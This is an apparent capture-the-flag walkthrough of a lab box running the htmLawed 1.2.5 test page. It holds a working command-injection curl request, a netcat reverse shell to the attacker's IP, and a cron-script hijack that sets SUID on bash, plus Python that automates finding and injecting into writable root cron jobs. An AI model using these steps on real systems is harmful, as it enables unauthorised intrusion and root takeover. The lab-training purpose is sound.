Date: Mar 26, 2025
Tags: Nmap, Web Exploitation, Privilege Escalation Techniques
192.168.108.190
Nmap
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:46 EDT
Nmap scan report for 192.168.108.190
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 14.62 seconds
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:46 EDT
Warning: 192.168.108.190 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.108.190
Host is up (0.066s latency).
All 65535 scanned ports on 192.168.108.190 are in ignored states.
Not shown: 65386 open|filtered udp ports (no-response), 149 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 145.48 seconds
└─# nmap -Pn -n $ip -sC -sV -p- --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:48 EDT
Nmap scan report for 192.168.108.190
Host is up (0.056s latency).
Not shown: 65466 closed tcp ports (reset), 67 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: htmLawed (1.2.5) test
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.49 seconds
22

Nothing found. OpenSSH 8.4p1 with no credentials yet, so we come back to it if we find any.
80

The site is the htmLawed 1.2.5 test page (see the http-title above). Its test form hands the `text` field to whatever PHP function is named in `hhook`, so `hhook=exec` makes it run `text` as a shell command. Change the curl command to our target IP and the command we want to run, keeping `sid` identical in the POST body and in the cookie:

curl -s -d "sid=foo&hhook=exec&text=whoami" -b "sid=foo" http://192.168.108.190/

Once `whoami` comes back, swap the command for a reverse shell. Start a listener on our machine first (`nc -lvnp 4444`), then send:

busybox nc 192.168.45.160 4444 -e /bin/bash

Because this goes in the POST body it has to be URL-encoded (spaces and slashes); curl's `--data-urlencode "text=..."` does that for us.

Got a shell back.
PE

Transfer linpeas.sh to the target and run it.

linpeas shows a script that cleans something; let's take a look.

It is a log cleaner.

We also don't have permission to read the log files it clears, so the script is presumably executed as root (a cron job), and it is owned by the current user, so we can edit it. Confirm both before touching it: `ls -l` on the script, and look for its entry in /etc/crontab or /etc/cron.d. Then add a privilege-escalation command to it (for example `chmod u+s /bin/bash`, followed by `/bin/bash -p` from our shell once the job has run).

After adding it and waiting for the next run, we get root.
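The check behind that step, as an added example that is not part of the original writeup: parse system crontab entries, keep the root jobs whose script we can write to, and append a payload to one. The crontab text, the fake cleaner script and the payload are constructed inside a temporary directory for the demo; on the box you read /etc/crontab and /etc/cron.d/* instead, and the script path is whatever linpeas reported.

```python
# Added example (not from the original writeup): find root cron jobs whose
# script is writable by us and append a payload. The crontab, script and
# payload below are constructed for the demo and live in a temp dir.
import os
import tempfile


def cron_jobs(crontab_text):
    """Return (user, command) for each job line of a system crontab.
    System crontabs carry a user field after the five schedule fields;
    @reboot/@daily-style lines carry it after the single keyword."""
    jobs = []
    for line in crontab_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue                      # blank, comment, or VAR=value line
        n = 1 if fields[0].startswith("@") else 5
        if len(fields) < n + 2:
            continue
        jobs.append((fields[n], " ".join(fields[n + 1:])))
    return jobs


def writable_root_jobs(jobs):
    """Root jobs whose command references an existing file we can write to.
    Note: run as root, os.access() says everything is writable."""
    hits = []
    for user, command in jobs:
        if user != "root":
            continue
        for tok in command.split():       # covers "/opt/x.sh" and "/bin/sh /opt/x.sh"
            if os.path.isfile(tok) and os.access(tok, os.W_OK):
                hits.append((tok, command))
                break
    return hits


def inject(script_path, payload):
    """Append a line to the script; it runs as root the next time cron fires."""
    with open(script_path, "a") as f:
        f.write("\n" + payload + "\n")
    return payload


def demo():
    """Constructed fixture: a writable fake log cleaner and a crontab
    (assumed layout) that runs it as root every five minutes."""
    d = tempfile.mkdtemp()
    cleaner = os.path.join(d, "cleanlogs.sh")
    with open(cleaner, "w") as f:
        f.write("#!/bin/bash\n: > /var/log/auth.log\n")
    os.chmod(cleaner, 0o777)
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"*/5 * * * * root {cleaner}\n"
        "@daily www-data /usr/bin/true\n"
        "0 3 * * * root /nonexistent/backup.sh\n"
    )
    jobs = cron_jobs(crontab)
    hits = writable_root_jobs(jobs)
    if hits:
        # SUID bash; then `/bin/bash -p` from our shell once cron has run it
        inject(hits[0][0], "chmod u+s /bin/bash")
    with open(cleaner) as f:
        content = f.read()
    return jobs, hits, content


if __name__ == "__main__":
    jobs, hits, content = demo()
    print(hits)
    print(content)
```

The `/nonexistent/backup.sh` entry shows the filter: a root job is only interesting if the file it runs actually exists and is writable, which is exactly what `ls -l` on the cleaner confirmed on the box.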